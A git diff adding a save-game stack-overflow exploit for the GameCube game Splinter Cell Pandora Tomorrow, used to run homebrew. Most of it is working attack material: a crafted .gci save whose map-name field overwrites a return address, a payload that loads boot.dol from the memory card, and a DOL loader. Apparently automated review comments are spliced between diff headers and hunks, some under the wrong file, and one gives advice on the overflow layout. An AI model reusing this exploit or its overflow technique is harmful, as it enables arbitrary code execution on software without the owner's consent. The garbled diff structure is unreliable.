diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..6776965
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,15 @@
+# Copyright 2016 FIX94
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+all:
+ @$(MAKE) --no-print-directory -C loader
+ @mv -f loader/loader.h exploit/loader.h
+ @$(MAKE) --no-print-directory -C exploit
+ @mkdir -p gci
+ @mv -f exploit/*.gci gci
+
+clean:
+ @$(MAKE) --no-print-directory -C loader clean
+ @$(MAKE) --no-print-directory -C exploit clean
+ rm -rf gci
diff --git a/README.md b/README.md
index b41c060..7940d0d 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,3 @@
 # pandoratomorrow-exploit-gc
-a exploit for splinter cell pandora tomorrow on gamecube
+A exploit for splinter cell pandora tomorrow on gamecube, you only need a method of injecting the .gci onto your memory card.
+This exploit will load a boot.dol converted with dol2gci (included in Home Bros.) from your memory card.
diff --git a/exploit/Makefile b/exploit/Makefile
new file mode 100644
index 0000000..714b693
--- /dev/null
+++ b/exploit/Makefile
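Review bot: `all` and `clean` are command names rather than files, but nothing declares them phony, so a stray file called `clean` or `all` in the repository root silently turns the corresponding `make` invocation into a no-op; add `.PHONY: all clean` above `all:`. The `@mv -f loader/loader.h exploit/loader.h` step also removes the loader's own output from the directory that produced it, so the generated header exists in exactly one place and a standalone `make -C loader` afterwards has nothing to compare against; `cp -f` would leave each sub-make's products where it expects them. `rm -rf gci` is a fixed relative path, so that line is safe as written.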
@@ -0,0 +1,88 @@
+# Copyright 2008-2009 Segher Boessenkool
+# GameCube Port Copyright 2016 FIX94
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= powerpc-eabi-
+
+ifeq ($(OS),Windows_NT)
+ FIXCRC = $(CURDIR)/pandoratomorrow_crc.exe
+else
+ FIXCRC = $(CURDIR)/pandoratomorrow_crc
+endif
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+ CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+ LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -O1 -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+ Q :=
+else
+ Q := @
+ MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := gt7e.gci gt7p.gci gt7x.gci
+targets-short := gt7e gt7p gt7x
+
+objs := pandoratomorrow.o
+
+all: $(targets)
+
+$(targets): %.gci : %.dat %.hdr
+ @echo " OUTPUT $@"
+ $(Q)dd if=$(filter %.hdr,$^) of=$@ bs=1 count=16540 2>/dev/null
+ $(Q)dd if=$(filter %.dat,$^) of=$@ bs=1 seek=16540 count=20480 2>/dev/null
+ $(Q)dd if=$(filter %.hdr,$^) of=$@ bs=1 skip=37020 seek=37020 count=4004 2>/dev/null
+ $(Q)$(FIXCRC) $@
+
+dats := gt7e.dat gt7p.dat gt7x.dat
+
+$(dats): %.dat: %.elf
+ @echo " OBJCOPY $@"
+ $(Q)$(OBJCOPY) -Obinary $< $@
+
+elfs := $(dats:.dat=.elf)
+
+gt7e.elf: baddr := 0x80488E40+0x405C
+gt7p.elf: baddr := 0x80489400+0x405C
+gt7x.elf: baddr := 0x80489400+0x405C
+$(elfs): %.elf: %.ld %.o $(objs)
+ @echo " LINK $@"
+ $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@
+
+exploit-objs := $(elfs:.elf=.o)
+
+$(exploit-objs): %.o: start.S mapAfterName.bin
+ @echo " ASSEMBLE $@"
+ $(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+%.o: %.c
+ @echo " COMPILE $@"
+ $(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+clean:
+ -rm -f
$(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) $(dats) loader.h
diff --git a/exploit/gt7e.hdr b/exploit/gt7e.hdr
new file mode 100644
index 0000000..f6c4c32
Binary files /dev/null and b/exploit/gt7e.hdr differ
diff --git a/exploit/gt7e.ld b/exploit/gt7e.ld
new file mode 100644
index 0000000..eaf0aa8
--- /dev/null
+++ b/exploit/gt7e.ld
@@ -0,0 +1,30 @@
+/* Copyright 2008-2009 Segher Boessenkool
+ GameCube Port Copyright 2016 FIX94
+ This code is licensed to you under the terms of the GNU GPL, version 2;
+ see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+ card_getres = 0x80315E80;
+ card_mountasync = 0x80319380;
+ card_unmount = 0x803195BC;
+ card_open = 0x8031A314;
+ card_close = 0x8031A430;
+ card_readasync = 0x8031AAC4;
+ gx_setdrawdone = 0x8032430C;
+ os_stopaudiosystem = 0x8032DFEC;
+ os_disable_scheduler = 0x80332AE0;
+
+ .pandoratomorrow baddr :
+ {
+ gt7*.o(.start)
+ *(.text)
+ *(.rodata .rodata.*)
+ *(.data)
+ . = 0xFFC;
+ *(.bss)
+ . = 0x5000;
+ }
+}
diff --git a/exploit/gt7p.hdr b/exploit/gt7p.hdr
new file mode 100644
index 0000000..a70175d
Binary files /dev/null and b/exploit/gt7p.hdr differ
diff --git a/exploit/gt7p.ld b/exploit/gt7p.ld
new file mode 100644
index 0000000..83c72a3
--- /dev/null
+++ b/exploit/gt7p.ld
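Review bot: The `$(Q)$(FIXCRC) $@` step at the end of the `$(targets)` recipe runs a checksum tool that no rule in this Makefile builds: on Windows `FIXCRC` resolves to the committed `exploit/pandoratomorrow_crc.exe` blob, and on every other host to `$(CURDIR)/pandoratomorrow_crc`, which is not in the tree, so a non-Windows `make` fails right after the `dd` steps while a Windows build puts an opaque prebuilt binary on the path that produces the shipped `.gci`. The tool's source is already in `../pandoratomorrow_crc`, so building it with a host compiler and making it an order-only prerequisite of the `.gci` targets fixes the Linux build and takes the committed binary out of the supply chain; the lines below do that. Separately, the `clean` recipe expands `$(saves)` and `$(slots)`, which are never defined in this file (they read like leftovers of the Wii version this was ported from), and `all`/`clean` should be declared `.PHONY`.
```make
HOSTCC ?= gcc

$(FIXCRC): ../pandoratomorrow_crc/crc32.c ../pandoratomorrow_crc/main.c
	$(Q)$(HOSTCC) -Wall -O2 -o $@ $^

$(targets): %.gci : %.dat %.hdr | $(FIXCRC)
# … unchanged: echo, the three dd steps and $(FIXCRC) $@ …
```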
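Review bot: The nine absolute addresses inside `SECTIONS` are SDK entry points resolved against one particular game build, and the `. = 0xFFC;` / `. = 0x5000;` assignments silently do two jobs — GNU ld errors out if text+rodata+data grow past 0xFFC because it cannot move the location counter backwards, and 0x5000 is exactly the 20480-byte save-data slot that `exploit/Makefile` copies with `dd ... count=20480` — yet none of that is written down. A header comment such as `/* SDK symbol addresses for the gt7e build; .bss must start at 0xFFC (size guard) and the image is padded to 0x5000 bytes to match the .gci data area written by the Makefile */` would let the next person re-derive the constants for another disc revision instead of guessing. Which revision the addresses came from is not visible here and should be named in that comment.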
@@ -0,0 +1,30 @@
+/* Copyright 2008-2009 Segher Boessenkool
+ GameCube Port Copyright 2016 FIX94
+ This code is licensed to you under the terms of the GNU GPL, version 2;
+ see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+ card_getres = 0x80316664;
+ card_mountasync = 0x80319B64;
+ card_unmount = 0x80319DA0;
+ card_open = 0x8031AAF8;
+ card_close = 0x8031AC14;
+ card_readasync = 0x8031B2A8;
+ gx_setdrawdone = 0x80324868;
+ os_stopaudiosystem = 0x8032E310;
+ os_disable_scheduler = 0x80332D5C;
+
+ .pandoratomorrow baddr :
+ {
+ gt7*.o(.start)
+ *(.text)
+ *(.rodata .rodata.*)
+ *(.data)
+ . = 0xFFC;
+ *(.bss)
+ . = 0x5000;
+ }
+}
diff --git a/exploit/gt7x.hdr b/exploit/gt7x.hdr
new file mode 100644
index 0000000..54d7836
Binary files /dev/null and b/exploit/gt7x.hdr differ
diff --git a/exploit/gt7x.ld b/exploit/gt7x.ld
new file mode 100644
index 0000000..83c72a3
--- /dev/null
+++ b/exploit/gt7x.ld
@@ -0,0 +1,30 @@
+/* Copyright 2008-2009 Segher Boessenkool
+ GameCube Port Copyright 2016 FIX94
+ This code is licensed to you under the terms of the GNU GPL, version 2;
+ see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+ card_getres = 0x80316664;
+ card_mountasync = 0x80319B64;
+ card_unmount = 0x80319DA0;
+ card_open = 0x8031AAF8;
+ card_close = 0x8031AC14;
+ card_readasync = 0x8031B2A8;
+ gx_setdrawdone = 0x80324868;
+ os_stopaudiosystem = 0x8032E310;
+ os_disable_scheduler = 0x80332D5C;
+
+ .pandoratomorrow baddr :
+ {
+ gt7*.o(.start)
+ *(.text)
+ *(.rodata .rodata.*)
+ *(.data)
+ . = 0xFFC;
+ *(.bss)
+ . = 0x5000;
+ }
+}
diff --git a/exploit/mapAfterName.bin b/exploit/mapAfterName.bin
new file mode 100644
index 0000000..48c5da3
Binary files /dev/null and b/exploit/mapAfterName.bin differ
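Review bot: `gt7x.ld` is byte-for-byte identical to `gt7p.ld` (both file headers carry blob `83c72a3`) and `exploit/Makefile` also assigns both the same `baddr`, but nothing says whether that is deliberate or a copy that still needs its own addresses. I cannot tell from here which it is; if the gt7x disc really shares the gt7p executable layout, a first-line comment such as `/* identical to gt7p.ld: the gt7x build shares the gt7p SDK layout */` prevents a future address fix from being applied to one copy only, and a single shared script pulled in by both targets would remove the duplication altogether.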
diff --git a/exploit/pandoratomorrow.c b/exploit/pandoratomorrow.c
new file mode 100644
index 0000000..6c28f6f
--- /dev/null
+++ b/exploit/pandoratomorrow.c
@@ -0,0 +1,143 @@
+// Copyright 2008-2009 Segher Boessenkool
+// GameCube Port Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+#include "loader.h"
+
+#define TO_ARAM 0
+#define TO_MRAM 1
+
+typedef unsigned int u32;
+typedef unsigned short u16;
+typedef unsigned char u8;
+typedef volatile unsigned int vu32;
+typedef volatile unsigned short vu16;
+
+typedef struct _cInfo
+{
+ int chan;
+ int fnum;
+ int offset;
+ int length;
+ u16 block;
+} cInfo;
+
+int card_getres(int chan);
+int card_mountasync(int chan, void* workArea, void *cb1, void *cb2);
+int card_unmount(int chan);
+int card_open(int chan, const char *path, cInfo *inf);
+int card_close(cInfo *inf);
+int card_readasync(cInfo *inf, void* addr, int length, int offset, void *cb);
+void gx_setdrawdone(void);
+void os_stopaudiosystem(void);
+void os_disable_scheduler(void);
+
+static void sync_cache(void *p, u32 n)
+{
+ u32 start, end;
+
+ start = (u32)p & ~31;
+ end = ((u32)p + n + 31) & ~31;
+ n = (end - start) >> 5;
+
+ while (n--) {
+ asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p));
+ p += 32;
+ }
+ asm("sync ; isync");
+}
+
+void *_memcpy(void *ptr, const void *src, int size)
+{
+ char* ptr2 = ptr;
+ const char* src2 = src;
+ while(size--) *ptr2++ = *src2++;
+ return ptr;
+}
+
+void os_enable_interrupts()
+{
+ asm("mfmsr 3 ; ori 3, 3, 0x8000 ; mtmsr 3");
+}
+
+void os_disable_interrupts()
+{
+ asm("mfmsr 3 ; rlwinm 3,3,0,17,15 ; mtmsr 3");
+}
+
+void ar_dma(u32 type, u32 mram, u32 aram, u32 len)
+{
+ //interrupts are enabled so play it safe
+ os_disable_interrupts();
+ while(*(vu16*)0xCC00500A & 0x200) ;
+ *(vu16*)0xCC005020 = (mram>>16);
+ *(vu16*)0xCC005022 = (mram&0xFFFF);
+ *(vu16*)0xCC005024 = (aram>>16);
+ *(vu16*)0xCC005026 = (aram&0xFFFF);
+ *(vu16*)0xCC005028 = (type<<15)|(len>>16);
+ *(vu16*)0xCC00502A = (len&0xFFFF);
+ while(*(vu16*)0xCC00500A & 0x200) ;
+
os_enable_interrupts();
+}
+
+void __attribute__ ((noreturn)) _main()
+{
+ //game audio threads are still running
+ //so we just disable threading to prevent the
+ //game from randomly crashing on CARD access
+ os_disable_scheduler();
+ //prevent BEEPing
+ os_stopaudiosystem();
+ //use setdrawdone because the scheduler is
+ //already disabled to prevent audio crashes
+ gx_setdrawdone();
+ //enable interrupts for CARD access
+ os_enable_interrupts();
+ //game id DOLX00 for boot.dol
+ *(volatile u32*)0x80000000 = 0x444F4C58;
+ *(volatile u16*)0x80000004 = 0x3030;
+ sync_cache((void*)0x80000000, 6);
+ //re-mount the memory card
+ card_mountasync(0, (void*)0x81200000, (void*)0, (void*)0);
+ int res;
+ //we have interrupts enabled so we will
+ //know when its not busy anymore luckily
+ while((res = card_getres(0)) == -1) ;
+ //open up boot.dol from memory card
+ cInfo mInf;
+ unsigned int boot_str[3]; boot_str[0] = 0x626F6F74;
+ boot_str[1] = 0x2E646F6C; boot_str[2] = 0;
+ card_open(0, ((char*)&boot_str), &mInf);
+ u32 curOffset = 0;
+ //copy until it returns error
+ while(card_readasync(&mInf, (void*)0x80001800, 0x200, curOffset, (void*)0) == 0)
+ {
+ int res;
+ //we have interrupts enabled so we will
+ //know when its not busy anymore luckily
+ while((res = card_getres(0)) == -1) ;
+ //this indirectly tells us the file is done
+ if(res < 0)
+ break;
+ sync_cache((void*)0x80001800, 0x200);
+ ar_dma(TO_ARAM, 0x1800, curOffset, 0x200);
+ curOffset += 0x200;
+ }
+ //we are done
+ card_close(&mInf);
+ card_unmount(0);
+ //not needed anymore
+ os_disable_interrupts();
+ //copy our loader into mem
+ _memcpy((void*)0x80001800, loader, loader_size);
+ sync_cache((void*)0x80001800, loader_size);
+ //jump to it
+ __asm__ volatile(
+ "lis 3, 0x8000\n"
+ "ori 3, 3, 0x1800\n"
+ "mtlr 3\n"
+ "blr\n"
+ );
+ __builtin_unreachable();
+}
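Review bot: `_main` never checks that the card mount or the file open succeeded: the `res` produced by the `card_getres(0)` spin after `card_mountasync` is thrown away, and `card_open(0, ((char*)&boot_str), &mInf)` is called for its side effect only, so with no card in slot A or no `boot.dol` on it the read loop exits on its first error and the code still copies the loader to `0x80001800` and jumps to it, which then interprets whatever stale bytes sit at ARAM offset 0 as a DOL header. The game's stack is already smashed, so there is nothing to return to and the honest failure mode is to halt: `if(res < 0) for(;;) ;` after the mount wait, and `if(card_open(0, ((char*)&boot_str), &mInf) != 0) for(;;) ;` in place of the bare call. The `os_enable_interrupts`/`os_disable_interrupts` asm statements also overwrite `r3` with no clobber list; both are non-static and may be inlined at `-O1` into code holding a live value in `r3`, so `asm volatile("mfmsr 3 ; ori 3, 3, 0x8000 ; mtmsr 3" : : : "r3", "memory")` (and the same for the disable variant) should state the clobber explicitly.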
diff --git a/exploit/pandoratomorrow_crc.exe b/exploit/pandoratomorrow_crc.exe
new file mode 100644
index 0000000..2c28ad7
Binary files /dev/null and b/exploit/pandoratomorrow_crc.exe differ
diff --git a/exploit/start.S b/exploit/start.S
new file mode 100644
index 0000000..df9ab65
--- /dev/null
+++ b/exploit/start.S
@@ -0,0 +1,29 @@
+// Copyright 2008-2009 Segher Boessenkool
+// GameCube Port Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+#define XSTR(x) #x
+#define ISTR(x) XSTR(x)
+
+ .section .start,"ax"
+
+ // Map Name string size, choose one that overflows stack
+ .short 0x22C
+ // Fill up Map Name
+ .fill 0x228,1,'A'
+ // Pointer to our code
+ .long start
+ // Further save info, not sure if needed
+ .incbin "mapAfterName.bin"
+ // Alignment
+ .short 0
+ // Fill up so game does not interpret code below as 2nd save info
+ .fill 0x4B0,1,0x00
+
+start:
+ // Disable interrupts
+ mfmsr 3 ; rlwinm 3,3,0,17,15 ; mtmsr 3
+
+ // Go for it!
+ b _main
diff --git a/loader/Makefile b/loader/Makefile
new file mode 100644
index 0000000..663383f
--- /dev/null
+++ b/loader/Makefile
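Review bot: The two constants that make the overflow land are left unexplained: `.short 0x22C` is the map-name length the game apparently trusts, and `.fill 0x228,1,'A'` plus `.long start` total exactly 0x22C bytes, so `start` is presumably the word that replaces the saved return address of the routine copying the name — but neither the target frame nor the fact that the two sizes must stay in step is recorded. A comment above `.short 0x22C` such as `// 0x228 bytes of filler reach the saved LR of the map-name copy; the following word is the return address and must be start` captures the dependency, and a `.if`/`.err` on the sum would catch a future edit to one value only. `XSTR`/`ISTR` are defined but never used and can be dropped. `start` also relies on `r1` still pointing at usable game stack when `_main` declares `mInf` and `boot_str` as locals; that assumption deserves a one-line note next to `b _main`.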
@@ -0,0 +1,60 @@
+# Copyright 2008-2009 Segher Boessenkool
+# GameCube Port Copyright 2016 FIX94
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= powerpc-eabi-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= C:\segher_wii_tools
+
+ifeq ($(OS),Windows_NT)
+ BIN2H = bin2h/bin2h.exe
+else
+ BIN2H = bin2h/bin2h
+endif
+
+# End of configuration.
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+ CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+ LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -O1 -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+ Q :=
+else
+ Q := @
+ MAKEFLAGS += --no-print-directory
+endif
+
+all:
+ @echo " ASSEMBLE start.o"
+ $(Q)$(CC) $(CFLAGS) -c start.S -o start.o
+ @echo " COMPILE loader.o"
+ $(Q)$(CC) $(CFLAGS) -c loader.c -o loader.o
+ @echo " LINK loader.elf"
+ $(Q)$(LD) start.o loader.o -T loader.ld -o loader.elf
+ @echo " OBJCOPY loader.bin"
+ $(Q)$(OBJCOPY) -Obinary loader.elf loader.bin
+ @echo " OUTPUT loader.h"
+ $(Q)$(BIN2H) loader.bin
+
+clean:
+ -rm -f start.o loader.o loader.elf loader.bin loader.h
diff --git a/loader/bin2h/bin2h b/loader/bin2h/bin2h
new file mode 100644
index 0000000..a84bed9
Binary files /dev/null and b/loader/bin2h/bin2h differ
diff --git a/loader/bin2h/bin2h.exe b/loader/bin2h/bin2h.exe
new file mode 100644
index 0000000..200ce15
Binary files /dev/null and b/loader/bin2h/bin2h.exe differ
diff --git a/loader/bin2h/main.c b/loader/bin2h/main.c
new file mode 100644
index 0000000..fd80a7d
--- /dev/null
+++ b/loader/bin2h/main.c
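Review bot: The last step of `all`, `$(Q)$(BIN2H) loader.bin`, runs the committed `bin2h/bin2h` or `bin2h/bin2h.exe` binary, and no rule derives either from `bin2h/main.c` sitting next to them, so the `loader.h` that gets embedded in the exploit is emitted by an opaque blob rather than by the source in the tree. A rule `$(BIN2H): bin2h/main.c` with recipe `$(Q)$(HOSTCC) -O2 -o $@ $<` (plus `HOSTCC ?= gcc` in the configuration section and `all: $(BIN2H)`) lets the binaries be deleted from the repository. `TOOLS ?= C:\segher_wii_tools` is never referenced anywhere in this file and looks like a leftover of the Wii original; `all` and `clean` should also be declared `.PHONY`, and since `all` has no prerequisites every step re-runs on each invocation, which is tolerable here but worth a comment.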
@@ -0,0 +1,84 @@
+/*
+bin2h for Nintendont (Kernel)
+
+Copyright (C) 2014 FIX94
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation version 2.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+*/
+#include
+#include
+#include
+#include
+int main (int argc, char **argv)
+{
+ if(argc < 2 || strrchr(argv[1], '.') == NULL || strcmp(".bin", strrchr(argv[1], '.')) != 0)
+ return 0;
+ /* read in file */
+ FILE *f = fopen(argv[1], "rb");
+ if(f == NULL)
+ return 0;
+ fseek(f,0,SEEK_END);
+ size_t fsize = ftell(f);
+ rewind(f);
+ unsigned char *bin = (unsigned char*)malloc(fsize);
+ fread(bin,fsize,1,f);
+ fclose(f);
+ /* new .h file */
+ size_t newnamelen = strrchr(argv[1], '.') - argv[1];
+ char *newname = calloc(newnamelen+3, sizeof(char));
+ strncpy(newname, argv[1], newnamelen);
+ strcpy(newname + newnamelen, ".h");
+
+ /* name for the .h content */
+ size_t basenamelen = newnamelen;
+ if(strchr(argv[1], '/') != NULL)
+ basenamelen -= (strrchr(argv[1], '/')+1 - argv[1]);
+
+ char *basename = calloc(basenamelen+1, sizeof(char));
+ if(strchr(argv[1], '/') != NULL)
+ strncpy(basename, strrchr(argv[1], '/')+1, basenamelen);
+ else
+ strncpy(basename, argv[1], basenamelen);
+
+ /* get creation time */
+ time_t curtime = time (NULL);
+ struct tm *loctime = localtime (&curtime);
+ /* create .h file */
+ f = fopen(newname, "w");
+ free(newname);
+ fputs("/*\n",f);
+ fprintf(f,"\tFilename : %s\n", strchr(argv[1], '/') != NULL ?
strrchr(argv[1], '/')+1 : argv[1]);
+ fprintf(f,"\tDate created: %s", asctime(loctime));
+ fputs("*/\n\n",f);
+ fprintf(f,"#define %s_size 0x%x\n\n",basename,fsize);
+ fprintf(f,"const unsigned char %s[] = {",basename);
+ free(basename);
+
+ size_t i = 0;
+ while(i < fsize)
+ {
+ if((i % 16) == 0)
+ fputs("\n",f);
+ if((i % 4) == 0)
+ fputs("\t",f);
+ fprintf(f,"0x%02X", *(bin+i));
+ i++;
+ if(i < fsize)
+ fputs(", ",f);
+ }
+ fprintf(f,"\n};\n");
+ fclose(f);
+ free(bin);
+ return 0;
+}
diff --git a/loader/bin2h/make.cmd b/loader/bin2h/make.cmd
new file mode 100644
index 0000000..6556691
--- /dev/null
+++ b/loader/bin2h/make.cmd
@@ -0,0 +1,2 @@
+gcc main.c -s -Os -static -o bin2h.exe
+pause
\ No newline at end of file
diff --git a/loader/bin2h/make.sh b/loader/bin2h/make.sh
new file mode 100644
index 0000000..963b14a
--- /dev/null
+++ b/loader/bin2h/make.sh
@@ -0,0 +1,2 @@
+gcc main.c -m32 -s -Os -static -o bin2h
+chmod a+x bin2h
diff --git a/loader/loader.c b/loader/loader.c
new file mode 100644
index 0000000..dc9038f
--- /dev/null
+++ b/loader/loader.c
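Review bot: Every error path in `main` returns 0, so when the argument does not end in `.bin`, `fopen(argv[1], "rb")` fails, or `malloc`/`fread` fall short, the tool exits successfully and the `loader/` build carries on without a `loader.h` (or with a truncated one), surfacing only later as a compile error in `exploit/`; return a non-zero status (`return 1;`) on each of those paths. The unchecked calls need checks too: the `malloc(fsize)` result, the `fread` count against 1, and `f = fopen(newname, "w")`, which is handed straight to `fputs` and dereferenced if NULL. `ftell` can return -1, which the `size_t fsize = ftell(f);` line turns into a huge size and an unbounded allocation, so test the `long` result for `< 0` before the cast, and the `0x%x` in the `#define %s_size` format should be `0x%zx` for its `size_t` argument.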
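Review bot: `make.sh` has no error handling, so when `gcc main.c -m32 -s -Os -static -o bin2h` fails the script still runs `chmod a+x bin2h` and exits with whatever chmod returned; start the file with `#!/bin/sh` and `set -e` so a failed compile is reported. `-m32` together with `-static` also requires a 32-bit static libc, which most modern 64-bit hosts no longer carry by default; nothing visible here needs the tool to be 32-bit, so dropping `-m32` (or documenting why it is there) would make the script work on more machines.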
@@ -0,0 +1,137 @@
+// Copyright 2008-2009 Segher Boessenkool
+// GameCube Port Copyright 2016 FIX94
+// This code is licensed to you under the terms of the GNU GPL, version 2;
+// see file LICENSE or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+typedef unsigned int u32;
+typedef unsigned short u16;
+typedef unsigned char u8;
+
+typedef struct _dolheader {
+ u32 text_pos[7];
+ u32 data_pos[11];
+ u32 text_start[7];
+ u32 data_start[11];
+ u32 text_size[7];
+ u32 data_size[11];
+ u32 bss_start;
+ u32 bss_size;
+ u32 entry_point;
+} dolheader;
+
+static u8 dolData[0x200] __attribute__ ((aligned(32)));
+
+#define vu16 volatile unsigned short
+#define TO_ARAM 0
+#define TO_MRAM 1
+void ar_dma(u32 type, u32 mram, u32 aram, u32 len)
+{
+ *(vu16*)0xcc005020 = (mram>>16);
+ *(vu16*)0xcc005022 = (mram&0xFFFF);
+ *(vu16*)0xcc005024 = (aram>>16);
+ *(vu16*)0xcc005026 = (aram&0xFFFF);
+ *(vu16*)0xcc005028 = (type<<15)|(len>>16);
+ *(vu16*)0xcc00502A = (len&0xFFFF);
+ while(*(vu16*)0xcc00500A & 0x200) ;
+}
+
+static void sync_cache(void *p, u32 n)
+{
+ u32 start, end;
+
+ start = (u32)p & ~31;
+ end = ((u32)p + n + 31) & ~31;
+ n = (end - start) >> 5;
+
+ while (n--) {
+ asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p));
+ p += 32;
+ }
+ asm("sync ; isync");
+}
+
+static void sync_before_read(void *p, u32 n)
+{
+ u32 start, end;
+
+ start = (u32)p & ~31;
+ end = ((u32)p + n + 31) & ~31;
+ n = (end - start) >> 5;
+
+ while (n--) {
+ asm("dcbf 0,%0" : : "b"(p));
+ p += 32;
+ }
+ asm("sync");
+}
+
+void *_memset(void *ptr, int c, int size) {
+ char* ptr2 = ptr;
+ while(size--) *ptr2++ = (char)c;
+ return ptr;
+}
+
+void *_memcpy(void *ptr, const void *src, int size) {
+ char* ptr2 = ptr;
+ const char* src2 = src;
+ while(size--) *ptr2++ = *src2++;
+ return ptr;
+}
+
+void readAlign(u8* bufPos, u32 length, u32 unalignedOffset)
+{
+ u32 alignedOffset = unalignedOffset & (~0x1FF);
+ u32 offsetDiff = unalignedOffset - alignedOffset;
+
+ if(offsetDiff > 0)
+ {
+
sync_before_read(dolData, 0x200);
+ ar_dma(TO_MRAM, (u32)dolData, alignedOffset, 0x200);
+ u32 write = ((length > 0x200) ? 0x200 : length) - offsetDiff;
+ _memcpy(bufPos, dolData + offsetDiff, write);
+ sync_cache(bufPos, write);
+ alignedOffset += 0x200;
+ bufPos += write;
+ length -= write;
+ }
+
+ while(length > 0)
+ {
+ sync_before_read(dolData, 0x200);
+ ar_dma(TO_MRAM, (u32)dolData, alignedOffset, 0x200);
+ u32 write = ((length > 0x200) ? 0x200 : length);
+ _memcpy(bufPos, dolData, write);
+ sync_cache(bufPos, write);
+ alignedOffset += 0x200;
+ bufPos += write;
+ length -= write;
+ }
+}
+
+void __attribute__ ((noreturn)) _main()
+{
+ int i;
+ dolheader dolHdr;
+ sync_before_read(dolData, 0x200);
+ ar_dma(TO_MRAM, (u32)dolData, 0, 0x200);
+ _memcpy(&dolHdr, dolData, sizeof(dolheader));
+ //write down boot.dol in memory
+ for (i = 0; i < 7; i++)
+ {
+ if ((!dolHdr.text_size[i]) || (dolHdr.text_start[i] < 0x100))
+ continue;
+ readAlign((u8*)dolHdr.text_start[i], dolHdr.text_size[i], dolHdr.text_pos[i]);
+ }
+ for (i = 0; i < 11; i++)
+ {
+ if ((!dolHdr.data_size[i]) || (dolHdr.data_start[i] < 0x100))
+ continue;
+ readAlign((u8*)dolHdr.data_start[i], dolHdr.data_size[i], dolHdr.data_pos[i]);
+ }
+ //lets jump
+ __asm__ volatile(
+ "mtlr %0\n"
+ "blr\n"
+ : : "r"(dolHdr.entry_point));
+ __builtin_unreachable();
+}
diff --git a/loader/loader.ld b/loader/loader.ld
new file mode 100644
index 0000000..ec6eaea
--- /dev/null
+++ b/loader/loader.ld
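Review bot: `readAlign` miscomputes the first partial block: `u32 write = ((length > 0x200) ? 0x200 : length) - offsetDiff;` subtracts the in-block offset from the segment length even when the segment is shorter than the distance to the next 0x200 boundary, so a segment with `length = 0x10` at `unalignedOffset = 0x1F0` gets `write = 0x10 - 0x1F0`, which wraps as `u32` and sends `_memcpy` off the end of `dolData` across memory, and a segment like `length = 0x1F0` at offset `0x100` copies 0xF0 bytes instead of the 0x100 still in the block and then takes the missing bytes from the wrong place in the next one. The bytes left in the block are `0x200 - offsetDiff`, so it should read `u32 avail = 0x200 - offsetDiff;` followed by `u32 write = (length > avail) ? avail : length;`. Beyond that, the header copied out of ARAM is trusted almost completely — only `text_start[i] < 0x100` / `data_start[i] < 0x100` is rejected — so a corrupt or hostile `boot.dol` can direct `readAlign` to write any size at any address, including over this loader at `0x80001800` while it runs, and `entry_point` is jumped to unchecked; a per-segment check that `start` is above the loader's own image, that `start + size` does not overflow and stays inside MEM1 (which ends at `0x81800000` on a retail console), and the same check on `entry_point`, would turn a bad file into a halt instead of executing garbage. `bss_start`/`bss_size` are copied into `dolHdr` but never used to zero anything; if the loaded program's own crt0 is expected to do that, a comment saying so would help.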
@@ -0,0 +1,26 @@
